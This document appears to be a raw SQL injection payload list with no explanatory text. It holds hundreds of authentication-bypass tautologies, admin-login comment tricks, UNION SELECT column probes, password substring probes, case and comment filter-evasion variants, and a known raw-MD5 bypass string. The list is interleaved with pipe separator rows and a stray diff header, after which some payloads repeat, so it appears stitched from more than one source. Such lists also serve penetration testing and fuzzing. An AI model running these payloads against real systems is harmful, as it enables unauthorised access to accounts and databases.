admin' or '1'='1
|
|
||||||
admin' or '1'='1'--
|
|
||||||
admin' or '1'='1'#
|
|
||||||
admin' or '1'='1'/*
|
|
||||||
admin'or 1=1 or ''='
|
|
||||||
admin' or 1=1
|
|
||||||
admin' or 1=1--
|
|
||||||
admin' or 1=1#
|
|
||||||
admin' or 1=1/*
|
|
||||||
admin') or ('1'='1
|
|
||||||
admin') or ('1'='1'--
|
|
||||||
admin') or ('1'='1'#
|
|
||||||
admin') or ('1'='1'/*
|
|
||||||
admin') or '1'='1
|
|
||||||
admin') or '1'='1'--
|
|
||||||
admin') or '1'='1'#
|
|
||||||
admin') or '1'='1'/*
|
|
||||||
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
admin" --
|
|
||||||
admin" #
|
|
||||||
admin"/*
|
|
||||||
admin" or "1"="1
|
|
||||||
admin" or "1"="1"--
|
|
||||||
admin" or "1"="1"#
|
|
||||||
admin" or "1"="1"/*
|
|
||||||
admin"or 1=1 or ""="
|
|
||||||
admin" or 1=1
|
|
||||||
admin" or 1=1--
|
|
||||||
admin" or 1=1#
|
|
||||||
admin" or 1=1/*
|
|
||||||
admin") or ("1"="1
|
|
||||||
admin") or ("1"="1"--
|
|
||||||
admin") or ("1"="1"#
|
|
||||||
admin") or ("1"="1"/*
|
|
||||||
admin") or "1"="1
|
|
||||||
admin") or "1"="1"--
|
|
||||||
admin") or "1"="1"#
|
|
||||||
admin") or "1"="1"/*
|
|
||||||
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
' --
|
|
||||||
' #
|
|
||||||
' –
|
|
||||||
'--
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
" --
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
' and 1='1
|
|
||||||
' and a='a
|
|
||||||
or 1=1
|
|
||||||
or true
|
|
||||||
' or ''='
|
|
||||||
" or ""="
|
|
||||||
1′) and '1′='1–
|
|
||||||
' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
and 1=1
|
|
||||||
and 1=1–
|
|
||||||
' and 'one'='one
|
|
||||||
' and 'one'='one–
|
|
||||||
' group by password having 1=1--
|
|
||||||
' group by userid having 1=1--
|
|
||||||
' group by username having 1=1--
|
|
||||||
like '%'
|
|
||||||
or 0=0 --
|
|
||||||
or 0=0 #
|
|
||||||
or 0=0 –
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 --
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 –
|
|
||||||
" or 0=0 --
|
|
||||||
" or 0=0 #
|
|
||||||
" or 0=0 –
|
|
||||||
%' or '0'='0
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1/*
|
|
||||||
or 1=1#
|
|
||||||
or 1=1–
|
|
||||||
' or 1=1--
|
|
||||||
' or '1'='1
|
|
||||||
' or '1'='1'--
|
|
||||||
' or '1'='1'/*
|
|
||||||
' or '1'='1'#
|
|
||||||
' or '1′='1
|
|
||||||
' or 1=1
|
|
||||||
' or 1=1 --
|
|
||||||
' or 1=1 –
|
|
||||||
' or 1=1--
|
|
||||||
' or 1=1;#
|
|
||||||
' or 1=1/*
|
|
||||||
' or 1=1#
|
|
||||||
' or 1=1–
|
|
||||||
') or '1'='1
|
|
||||||
') or '1'='1--
|
|
||||||
') or '1'='1'--
|
|
||||||
') or '1'='1'/*
|
|
||||||
') or '1'='1'#
|
|
||||||
') or ('1'='1
|
|
||||||
') or ('1'='1--
|
|
||||||
') or ('1'='1'--
|
|
||||||
') or ('1'='1'/*
|
|
||||||
') or ('1'='1'#
|
|
||||||
'or'1=1
|
|
||||||
'or'1=1′
|
|
||||||
" or "1"="1
|
|
||||||
" or "1"="1"--
|
|
||||||
" or "1"="1"/*
|
|
||||||
" or "1"="1"#
|
|
||||||
" or 1=1
|
|
||||||
" or 1=1 --
|
|
||||||
" or 1=1 –
|
|
||||||
" or 1=1--
|
|
||||||
" or 1=1/*
|
|
||||||
" or 1=1#
|
|
||||||
" or 1=1–
|
|
||||||
") or "1"="1
|
|
||||||
") or "1"="1"--
|
|
||||||
") or "1"="1"/*
|
|
||||||
") or "1"="1"#
|
|
||||||
") or ("1"="1
|
|
||||||
") or ("1"="1"--
|
|
||||||
") or ("1"="1"/*
|
|
||||||
") or ("1"="1"#
|
|
||||||
) or '1′='1–
|
|
||||||
) or ('1′='1–
|
|
||||||
' or 1=1 LIMIT 1;#
|
|
||||||
'or 1=1 or ''='
|
|
||||||
"or 1=1 or ""="
|
|
||||||
' or 'a'='a
|
|
||||||
' or a=a--
|
|
||||||
' or a=a–
|
|
||||||
') or ('a'='a
|
|
||||||
" or "a"="a
|
|
||||||
") or ("a"="a
|
|
||||||
') or ('a'='a and hi") or ("a"="a
|
|
||||||
' or 'one'='one
|
|
||||||
' or 'one'='one–
|
|
||||||
' or uid like '%
|
|
||||||
' or uname like '%
|
|
||||||
' or userid like '%
|
|
||||||
' or user like '%
|
|
||||||
' or username like '%
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x'='x
|
|
||||||
" or "x"="x
|
|
||||||
' OR 'x'='x'#;
|
|
||||||
'=' 'or' and '=' 'or'
|
|
||||||
' UNION ALL SELECT 1, @@version;#
|
|
||||||
' UNION ALL SELECT system_user(),user();#
|
|
||||||
' UNION select table_schema,table_name FROM information_Schema.tables;#
|
|
||||||
admin' and substring(password/text(),1,1)='7
|
|
||||||
' and substring(password/text(),1,1)='7
|
|
||||||
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
"
|
|
||||||
'-- 2
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
"-- 2
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
'-'
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
'='
|
|
||||||
0'<'2
|
|
||||||
"-"
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
"="
|
|
||||||
0"<"2
|
|
||||||
|
|
||||||
')
|
|
||||||
")
|
|
||||||
')-- 2
|
|
||||||
')/*
|
|
||||||
')#
|
|
||||||
")-- 2
|
|
||||||
") #
|
|
||||||
")/*
|
|
||||||
')-('
|
|
||||||
')&('
|
|
||||||
')^('
|
|
||||||
')*('
|
|
||||||
')=('
|
|
||||||
0')<('2
|
|
||||||
")-("
|
|
||||||
")&("
|
|
||||||
")^("
|
|
||||||
")*("
|
|
||||||
")=("
|
|
||||||
0")<("2
|
|
||||||
|
|
||||||
'-''-- 2
|
|
||||||
'-''#
|
|
||||||
'-''/*
|
|
||||||
'&''-- 2
|
|
||||||
'&''#
|
|
||||||
'&''/*
|
|
||||||
'^''-- 2
|
|
||||||
'^''#
|
|
||||||
'^''/*
|
|
||||||
'*''-- 2
|
|
||||||
'*''#
|
|
||||||
'*''/*
|
|
||||||
'=''-- 2
|
|
||||||
'=''#
|
|
||||||
'=''/*
|
|
||||||
0'<'2'-- 2
|
|
||||||
0'<'2'#
|
|
||||||
0'<'2'/*
|
|
||||||
"-""-- 2
|
|
||||||
"-""#
|
|
||||||
"-""/*
|
|
||||||
"&""-- 2
|
|
||||||
"&""#
|
|
||||||
"&""/*
|
|
||||||
"^""-- 2
|
|
||||||
"^""#
|
|
||||||
"^""/*
|
|
||||||
"*""-- 2
|
|
||||||
"*""#
|
|
||||||
"*""/*
|
|
||||||
"=""-- 2
|
|
||||||
"=""#
|
|
||||||
"=""/*
|
|
||||||
0"<"2"-- 2
|
|
||||||
0"<"2"#
|
|
||||||
0"<"2"/*
|
|
||||||
|
|
||||||
')-''-- 2
|
|
||||||
')-''#
|
|
||||||
')-''/*
|
|
||||||
')&''-- 2
|
|
||||||
')&''#
|
|
||||||
')&''/*
|
|
||||||
')^''-- 2
|
|
||||||
')^''#
|
|
||||||
')^''/*
|
|
||||||
')*''-- 2
|
|
||||||
')*''#
|
|
||||||
')*''/*
|
|
||||||
')=''-- 2
|
|
||||||
')=''#
|
|
||||||
')=''/*
|
|
||||||
0')<'2'-- 2
|
|
||||||
0')<'2'#
|
|
||||||
0')<'2'/*
|
|
||||||
")-""-- 2
|
|
||||||
")-""#
|
|
||||||
")-""/*
|
|
||||||
")&""-- 2
|
|
||||||
")&""#
|
|
||||||
")&""/*
|
|
||||||
")^""-- 2
|
|
||||||
")^""#
|
|
||||||
")^""/*
|
|
||||||
")*""-- 2
|
|
||||||
")*""#
|
|
||||||
")*""/*
|
|
||||||
")=""-- 2
|
|
||||||
")=""#
|
|
||||||
")=""/*
|
|
||||||
0")<"2-- 2
|
|
||||||
0")<"2#
|
|
||||||
0")<"2/*
|
|
||||||
|
|
||||||
|
|
||||||
'oR'2
|
|
||||||
'oR'2'-- 2
|
|
||||||
'oR'2'#
|
|
||||||
'oR'2'/*
|
|
||||||
'oR'2'oR'
|
|
||||||
'oR(2)-- 2
|
|
||||||
'oR(2)#
|
|
||||||
'oR(2)/*
|
|
||||||
'oR(2)oR'
|
|
||||||
'oR 2-- 2
|
|
||||||
'oR 2#
|
|
||||||
'oR 2/*
|
|
||||||
'oR 2 oR'
|
|
||||||
'oR/**/2-- 2
|
|
||||||
'oR/**/2#
|
|
||||||
'oR/**/2/*
|
|
||||||
'oR/**/2/**/oR'
|
|
||||||
"oR"2
|
|
||||||
"oR"2"-- 2
|
|
||||||
"oR"2"#
|
|
||||||
"oR"2"/*
|
|
||||||
"oR"2"oR"
|
|
||||||
"oR(2)-- 2
|
|
||||||
"oR(2)#
|
|
||||||
"oR(2)/*
|
|
||||||
"oR(2)oR"
|
|
||||||
"oR 2-- 2
|
|
||||||
"oR 2#
|
|
||||||
"oR 2/*
|
|
||||||
"oR 2 oR"
|
|
||||||
"oR/**/2-- 2
|
|
||||||
"oR/**/2#
|
|
||||||
"oR/**/2/*
|
|
||||||
"oR/**/2/**/oR"
|
|
||||||
|
|
||||||
'oR'2'='2
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR'2'='2'-- 2
|
|
||||||
'oR'2'='2'#
|
|
||||||
'oR'2'='2'/*
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR 2=2-- 2
|
|
||||||
'oR 2=2#
|
|
||||||
'oR 2=2/*
|
|
||||||
'oR 2=2 oR'
|
|
||||||
'oR/**/2=2-- 2
|
|
||||||
'oR/**/2=2#
|
|
||||||
'oR/**/2=2/*
|
|
||||||
'oR/**/2=2/**/oR'
|
|
||||||
'oR(2)=2-- 2
|
|
||||||
'oR(2)=2#
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=(2)oR'
|
|
||||||
'oR'2'='2' LimIT 1-- 2
|
|
||||||
'oR'2'='2' LimIT 1#
|
|
||||||
'oR'2'='2' LimIT 1/*
|
|
||||||
'oR(2)=(2)LimIT(1)-- 2
|
|
||||||
'oR(2)=(2)LimIT(1)#
|
|
||||||
'oR(2)=(2)LimIT(1)/*
|
|
||||||
"oR"2"="2
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR"2"="2"-- 2
|
|
||||||
"oR"2"="2"#
|
|
||||||
"oR"2"="2"/*
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR 2=2-- 2
|
|
||||||
"oR 2=2#
|
|
||||||
"oR 2=2/*
|
|
||||||
"oR 2=2 oR"
|
|
||||||
"oR/**/2=2-- 2
|
|
||||||
"oR/**/2=2#
|
|
||||||
"oR/**/2=2/*
|
|
||||||
"oR/**/2=2/**/oR"
|
|
||||||
"oR(2)=2-- 2
|
|
||||||
"oR(2)=2#
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=(2)oR"
|
|
||||||
"oR"2"="2" LimIT 1-- 2
|
|
||||||
"oR"2"="2" LimIT 1#
|
|
||||||
"oR"2"="2" LimIT 1/*
|
|
||||||
"oR(2)=(2)LimIT(1)-- 2
|
|
||||||
"oR(2)=(2)LimIT(1)#
|
|
||||||
"oR(2)=(2)LimIT(1)/*
|
|
||||||
|
|
||||||
'oR true-- 2
|
|
||||||
'oR true#
|
|
||||||
'oR true/*
|
|
||||||
'oR true oR'
|
|
||||||
'oR(true)-- 2
|
|
||||||
'oR(true)#
|
|
||||||
'oR(true)/*
|
|
||||||
'oR(true)oR'
|
|
||||||
'oR/**/true-- 2
|
|
||||||
'oR/**/true#
|
|
||||||
'oR/**/true/*
|
|
||||||
'oR/**/true/**/oR'
|
|
||||||
"oR true-- 2
|
|
||||||
"oR true#
|
|
||||||
"oR true/*
|
|
||||||
"oR true oR"
|
|
||||||
"oR(true)-- 2
|
|
||||||
"oR(true)#
|
|
||||||
"oR(true)/*
|
|
||||||
"oR(true)oR"
|
|
||||||
"oR/**/true-- 2
|
|
||||||
"oR/**/true#
|
|
||||||
"oR/**/true/*
|
|
||||||
"oR/**/true/**/oR"
|
|
||||||
|
|
||||||
'oR'2'LiKE'2
|
|
||||||
'oR'2'LiKE'2'-- 2
|
|
||||||
'oR'2'LiKE'2'#
|
|
||||||
'oR'2'LiKE'2'/*
|
|
||||||
'oR'2'LiKE'2'oR'
|
|
||||||
'oR(2)LiKE(2)-- 2
|
|
||||||
'oR(2)LiKE(2)#
|
|
||||||
'oR(2)LiKE(2)/*
|
|
||||||
'oR(2)LiKE(2)oR'
|
|
||||||
"oR"2"LiKE"2
|
|
||||||
"oR"2"LiKE"2"-- 2
|
|
||||||
"oR"2"LiKE"2"#
|
|
||||||
"oR"2"LiKE"2"/*
|
|
||||||
"oR"2"LiKE"2"oR"
|
|
||||||
"oR(2)LiKE(2)-- 2
|
|
||||||
"oR(2)LiKE(2)#
|
|
||||||
"oR(2)LiKE(2)/*
|
|
||||||
"oR(2)LiKE(2)oR"
|
|
||||||
|
|
||||||
admin
|
|
||||||
admin'-- 2
|
|
||||||
admin'#
|
|
||||||
admin'/*
|
|
||||||
admin"-- 2
|
|
||||||
admin"#
|
|
||||||
ffifdyop
|
|
||||||
|
|
||||||
' UniON SElecT 1,2-- 2
|
|
||||||
' UniON SElecT 1,2,3-- 2
|
|
||||||
' UniON SElecT 1,2,3,4-- 2
|
|
||||||
' UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
' UniON SElecT 1,2#
|
|
||||||
' UniON SElecT 1,2,3#
|
|
||||||
' UniON SElecT 1,2,3,4#
|
|
||||||
' UniON SElecT 1,2,3,4,5#
|
|
||||||
'UniON(SElecT(1),2)-- 2
|
|
||||||
'UniON(SElecT(1),2,3)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
'UniON(SElecT(1),2)#
|
|
||||||
'UniON(SElecT(1),2,3)#
|
|
||||||
'UniON(SElecT(1),2,3,4)#
|
|
||||||
'UniON(SElecT(1),2,3,4,5)#
|
|
||||||
" UniON SElecT 1,2-- 2
|
|
||||||
" UniON SElecT 1,2,3-- 2
|
|
||||||
" UniON SElecT 1,2,3,4-- 2
|
|
||||||
" UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
" UniON SElecT 1,2#
|
|
||||||
" UniON SElecT 1,2,3#
|
|
||||||
" UniON SElecT 1,2,3,4#
|
|
||||||
" UniON SElecT 1,2,3,4,5#
|
|
||||||
"UniON(SElecT(1),2)-- 2
|
|
||||||
"UniON(SElecT(1),2,3)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
"UniON(SElecT(1),2)#
|
|
||||||
"UniON(SElecT(1),2,3)#
|
|
||||||
"UniON(SElecT(1),2,3,4)#
|
|
||||||
"UniON(SElecT(1),2,3,4,5)#
|
|
||||||
|
|
||||||
'||'2
|
|
||||||
'||2-- 2
|
|
||||||
'||'2'||'
|
|
||||||
'||2#
|
|
||||||
'||2/*
|
|
||||||
'||2||'
|
|
||||||
"||"2
|
|
||||||
"||2-- 2
|
|
||||||
"||"2"||"
|
|
||||||
"||2#
|
|
||||||
"||2/*
|
|
||||||
"||2||"
|
|
||||||
'||'2'='2
|
|
||||||
'||'2'='2'||'
|
|
||||||
'||2=2-- 2
|
|
||||||
'||2=2#
|
|
||||||
'||2=2/*
|
|
||||||
'||2=2||'
|
|
||||||
"||"2"="2
|
|
||||||
"||"2"="2"||"
|
|
||||||
"||2=2-- 2
|
|
||||||
"||2=2#
|
|
||||||
"||2=2/*
|
|
||||||
"||2=2||"
|
|
||||||
'||2=(2)LimIT(1)-- 2
|
|
||||||
'||2=(2)LimIT(1)#
|
|
||||||
'||2=(2)LimIT(1)/*
|
|
||||||
"||2=(2)LimIT(1)-- 2
|
|
||||||
"||2=(2)LimIT(1)#
|
|
||||||
"||2=(2)LimIT(1)/*
|
|
||||||
'||true-- 2
|
|
||||||
'||true#
|
|
||||||
'||true/*
|
|
||||||
'||true||'
|
|
||||||
"||true-- 2
|
|
||||||
"||true#
|
|
||||||
"||true/*
|
|
||||||
"||true||"
|
|
||||||
'||'2'LiKE'2
|
|
||||||
'||'2'LiKE'2'-- 2
|
|
||||||
'||'2'LiKE'2'#
|
|
||||||
'||'2'LiKE'2'/*
|
|
||||||
'||'2'LiKE'2'||'
|
|
||||||
'||(2)LiKE(2)-- 2
|
|
||||||
'||(2)LiKE(2)#
|
|
||||||
'||(2)LiKE(2)/*
|
|
||||||
'||(2)LiKE(2)||'
|
|
||||||
"||"2"LiKE"2
|
|
||||||
"||"2"LiKE"2"-- 2
|
|
||||||
"||"2"LiKE"2"#
|
|
||||||
"||"2"LiKE"2"/*
|
|
||||||
"||"2"LiKE"2"||"
|
|
||||||
"||(2)LiKE(2)-- 2
|
|
||||||
"||(2)LiKE(2)#
|
|
||||||
"||(2)LiKE(2)/*
|
|
||||||
"||(2)LiKE(2)||"
|
|
||||||
|
|
||||||
')oR('2
|
|
||||||
')oR'2'-- 2
|
|
||||||
')oR'2'#
|
|
||||||
')oR'2'/*
|
|
||||||
')oR'2'oR('
|
|
||||||
')oR(2)-- 2
|
|
||||||
')oR(2)#
|
|
||||||
')oR(2)/*
|
|
||||||
')oR(2)oR('
|
|
||||||
')oR 2-- 2
|
|
||||||
')oR 2#
|
|
||||||
')oR 2/*
|
|
||||||
')oR 2 oR('
|
|
||||||
')oR/**/2-- 2
|
|
||||||
')oR/**/2#
|
|
||||||
')oR/**/2/*
|
|
||||||
')oR/**/2/**/oR('
|
|
||||||
")oR("2
|
|
||||||
")oR"2"-- 2
|
|
||||||
")oR"2"#
|
|
||||||
")oR"2"/*
|
|
||||||
")oR"2"oR("
|
|
||||||
")oR(2)-- 2
|
|
||||||
")oR(2)#
|
|
||||||
")oR(2)/*
|
|
||||||
")oR(2)oR("
|
|
||||||
")oR 2-- 2
|
|
||||||
")oR 2#
|
|
||||||
")oR 2/*
|
|
||||||
")oR 2 oR("
|
|
||||||
")oR/**/2-- 2
|
|
||||||
")oR/**/2#
|
|
||||||
")oR/**/2/*
|
|
||||||
")oR/**/2/**/oR("
|
|
||||||
')oR'2'=('2
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR'2'='2'-- 2
|
|
||||||
')oR'2'='2'#
|
|
||||||
')oR'2'='2'/*
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR 2=2-- 2
|
|
||||||
')oR 2=2#
|
|
||||||
')oR 2=2/*
|
|
||||||
')oR 2=2 oR('
|
|
||||||
')oR/**/2=2-- 2
|
|
||||||
')oR/**/2=2#
|
|
||||||
')oR/**/2=2/*
|
|
||||||
')oR/**/2=2/**/oR('
|
|
||||||
')oR(2)=2-- 2
|
|
||||||
')oR(2)=2#
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=(2)oR('
|
|
||||||
')oR'2'='2' LimIT 1-- 2
|
|
||||||
')oR'2'='2' LimIT 1#
|
|
||||||
')oR'2'='2' LimIT 1/*
|
|
||||||
')oR(2)=(2)LimIT(1)-- 2
|
|
||||||
')oR(2)=(2)LimIT(1)#
|
|
||||||
')oR(2)=(2)LimIT(1)/*
|
|
||||||
")oR"2"=("2
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR"2"="2"-- 2
|
|
||||||
")oR"2"="2"#
|
|
||||||
")oR"2"="2"/*
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR 2=2-- 2
|
|
||||||
")oR 2=2#
|
|
||||||
")oR 2=2/*
|
|
||||||
")oR 2=2 oR("
|
|
||||||
")oR/**/2=2-- 2
|
|
||||||
")oR/**/2=2#
|
|
||||||
")oR/**/2=2/*
|
|
||||||
")oR/**/2=2/**/oR("
|
|
||||||
")oR(2)=2-- 2
|
|
||||||
")oR(2)=2#
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=(2)oR("
|
|
||||||
")oR"2"="2" LimIT 1-- 2
|
|
||||||
")oR"2"="2" LimIT 1#
|
|
||||||
")oR"2"="2" LimIT 1/*
|
|
||||||
")oR(2)=(2)LimIT(1)-- 2
|
|
||||||
")oR(2)=(2)LimIT(1)#
|
|
||||||
")oR(2)=(2)LimIT(1)/*
|
|
||||||
')oR true-- 2
|
|
||||||
')oR true#
|
|
||||||
')oR true/*
|
|
||||||
')oR true oR('
|
|
||||||
')oR(true)-- 2
|
|
||||||
')oR(true)#
|
|
||||||
')oR(true)/*
|
|
||||||
')oR(true)oR('
|
|
||||||
')oR/**/true-- 2
|
|
||||||
')oR/**/true#
|
|
||||||
')oR/**/true/*
|
|
||||||
')oR/**/true/**/oR('
|
|
||||||
")oR true-- 2
|
|
||||||
")oR true#
|
|
||||||
")oR true/*
|
|
||||||
")oR true oR("
|
|
||||||
")oR(true)-- 2
|
|
||||||
")oR(true)#
|
|
||||||
")oR(true)/*
|
|
||||||
")oR(true)oR("
|
|
||||||
")oR/**/true-- 2
|
|
||||||
")oR/**/true#
|
|
||||||
")oR/**/true/*
|
|
||||||
")oR/**/true/**/oR("
|
|
||||||
')oR'2'LiKE('2
|
|
||||||
')oR'2'LiKE'2'-- 2
|
|
||||||
')oR'2'LiKE'2'#
|
|
||||||
')oR'2'LiKE'2'/*
|
|
||||||
')oR'2'LiKE'2'oR('
|
|
||||||
')oR(2)LiKE(2)-- 2
|
|
||||||
')oR(2)LiKE(2)#
|
|
||||||
')oR(2)LiKE(2)/*
|
|
||||||
')oR(2)LiKE(2)oR('
|
|
||||||
")oR"2"LiKE("2
|
|
||||||
")oR"2"LiKE"2"-- 2
|
|
||||||
")oR"2"LiKE"2"#
|
|
||||||
")oR"2"LiKE"2"/*
|
|
||||||
")oR"2"LiKE"2"oR("
|
|
||||||
")oR(2)LiKE(2)-- 2
|
|
||||||
")oR(2)LiKE(2)#
|
|
||||||
")oR(2)LiKE(2)/*
|
|
||||||
")oR(2)LiKE(2)oR("
|
|
||||||
admin')-- 2
|
|
||||||
admin')#
|
|
||||||
admin')/*
|
|
||||||
admin")-- 2
|
|
||||||
admin")#
|
|
||||||
') UniON SElecT 1,2-- 2
|
|
||||||
') UniON SElecT 1,2,3-- 2
|
|
||||||
') UniON SElecT 1,2,3,4-- 2
|
|
||||||
') UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
') UniON SElecT 1,2#
|
|
||||||
') UniON SElecT 1,2,3#
|
|
||||||
') UniON SElecT 1,2,3,4#
|
|
||||||
') UniON SElecT 1,2,3,4,5#
|
|
||||||
')UniON(SElecT(1),2)-- 2
|
|
||||||
')UniON(SElecT(1),2,3)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
')UniON(SElecT(1),2)#
|
|
||||||
')UniON(SElecT(1),2,3)#
|
|
||||||
')UniON(SElecT(1),2,3,4)#
|
|
||||||
')UniON(SElecT(1),2,3,4,5)#
|
|
||||||
") UniON SElecT 1,2-- 2
|
|
||||||
") UniON SElecT 1,2,3-- 2
|
|
||||||
") UniON SElecT 1,2,3,4-- 2
|
|
||||||
") UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
") UniON SElecT 1,2#
|
|
||||||
") UniON SElecT 1,2,3#
|
|
||||||
") UniON SElecT 1,2,3,4#
|
|
||||||
") UniON SElecT 1,2,3,4,5#
|
|
||||||
")UniON(SElecT(1),2)-- 2
|
|
||||||
")UniON(SElecT(1),2,3)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
")UniON(SElecT(1),2)#
|
|
||||||
")UniON(SElecT(1),2,3)#
|
|
||||||
")UniON(SElecT(1),2,3,4)#
|
|
||||||
")UniON(SElecT(1),2,3,4,5)#
|
|
||||||
')||('2
|
|
||||||
')||2-- 2
|
|
||||||
')||'2'||('
|
|
||||||
')||2#
|
|
||||||
')||2/*
|
|
||||||
')||2||('
|
|
||||||
")||("2
|
|
||||||
")||2-- 2
|
|
||||||
")||"2"||("
|
|
||||||
")||2#
|
|
||||||
")||2/*
|
|
||||||
")||2||("
|
|
||||||
')||'2'=('2
|
|
||||||
')||'2'='2'||('
|
|
||||||
')||2=2-- 2
|
|
||||||
')||2=2#
|
|
||||||
')||2=2/*
|
|
||||||
')||2=2||('
|
|
||||||
")||"2"=("2
|
|
||||||
")||"2"="2"||("
|
|
||||||
")||2=2-- 2
|
|
||||||
")||2=2#
|
|
||||||
")||2=2/*
|
|
||||||
")||2=2||("
|
|
||||||
')||2=(2)LimIT(1)-- 2
|
|
||||||
')||2=(2)LimIT(1)#
|
|
||||||
')||2=(2)LimIT(1)/*
|
|
||||||
")||2=(2)LimIT(1)-- 2
|
|
||||||
")||2=(2)LimIT(1)#
|
|
||||||
")||2=(2)LimIT(1)/*
|
|
||||||
')||true-- 2
|
|
||||||
')||true#
|
|
||||||
')||true/*
|
|
||||||
')||true||('
|
|
||||||
")||true-- 2
|
|
||||||
")||true#
|
|
||||||
")||true/*
|
|
||||||
")||true||("
|
|
||||||
')||'2'LiKE('2
|
|
||||||
')||'2'LiKE'2'-- 2
|
|
||||||
')||'2'LiKE'2'#
|
|
||||||
')||'2'LiKE'2'/*
|
|
||||||
')||'2'LiKE'2'||('
|
|
||||||
')||(2)LiKE(2)-- 2
|
|
||||||
')||(2)LiKE(2)#
|
|
||||||
')||(2)LiKE(2)/*
|
|
||||||
')||(2)LiKE(2)||('
|
|
||||||
")||"2"LiKE("2
|
|
||||||
")||"2"LiKE"2"-- 2
|
|
||||||
")||"2"LiKE"2"#
|
|
||||||
")||"2"LiKE"2"/*
|
|
||||||
")||"2"LiKE"2"||("
|
|
||||||
")||(2)LiKE(2)-- 2
|
|
||||||
")||(2)LiKE(2)#
|
|
||||||
")||(2)LiKE(2)/*
|
|
||||||
")||(2)LiKE(2)||("
|
|
||||||
' UnION SELeCT 1,2`
|
|
||||||
' UnION SELeCT 1,2,3`
|
|
||||||
' UnION SELeCT 1,2,3,4`
|
|
||||||
' UnION SELeCT 1,2,3,4,5`
|
|
||||||
" UnION SELeCT 1,2`
|
|
||||||
" UnION SELeCT 1,2,3`
|
|
||||||
" UnION SELeCT 1,2,3,4`
|
|
||||||
" UnION SELeCT 1,2,3,4,5`
|
|
||||||
@ -1,771 +0,0 @@
|
|||||||
'-'
|
|
||||||
' '
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
' or ''-'
|
|
||||||
' or '' '
|
|
||||||
' or ''&'
|
|
||||||
' or ''^'
|
|
||||||
' or ''*'
|
|
||||||
"-"
|
|
||||||
" "
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
" or ""-"
|
|
||||||
" or "" "
|
|
||||||
" or ""&"
|
|
||||||
" or ""^"
|
|
||||||
" or ""*"
|
|
||||||
or true--
|
|
||||||
" or true--
|
|
||||||
' or true--
|
|
||||||
") or true--
|
|
||||||
') or true--
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x')=('x
|
|
||||||
')) or (('x'))=(('x
|
|
||||||
" or "x"="x
|
|
||||||
") or ("x")=("x
|
|
||||||
")) or (("x"))=(("x
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1#
|
|
||||||
or 1=1/*
|
|
||||||
admin' --
|
|
||||||
admin' #
|
|
||||||
admin'/*
|
|
||||||
admin' or '1'='1
|
|
||||||
admin' or '1'='1'--
|
|
||||||
admin' or '1'='1'#
|
|
||||||
admin' or '1'='1'/*
|
|
||||||
admin'or 1=1 or ''='
|
|
||||||
admin' or 1=1
|
|
||||||
admin' or 1=1--
|
|
||||||
admin' or 1=1#
|
|
||||||
admin' or 1=1/*
|
|
||||||
admin') or ('1'='1
|
|
||||||
admin') or ('1'='1'--
|
|
||||||
admin') or ('1'='1'#
|
|
||||||
admin') or ('1'='1'/*
|
|
||||||
admin') or '1'='1
|
|
||||||
admin') or '1'='1'--
|
|
||||||
admin') or '1'='1'#
|
|
||||||
admin') or '1'='1'/*
|
|
||||||
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
admin" --
|
|
||||||
admin" #
|
|
||||||
admin"/*
|
|
||||||
admin" or "1"="1
|
|
||||||
admin" or "1"="1"--
|
|
||||||
admin" or "1"="1"#
|
|
||||||
admin" or "1"="1"/*
|
|
||||||
admin"or 1=1 or ""="
|
|
||||||
admin" or 1=1
|
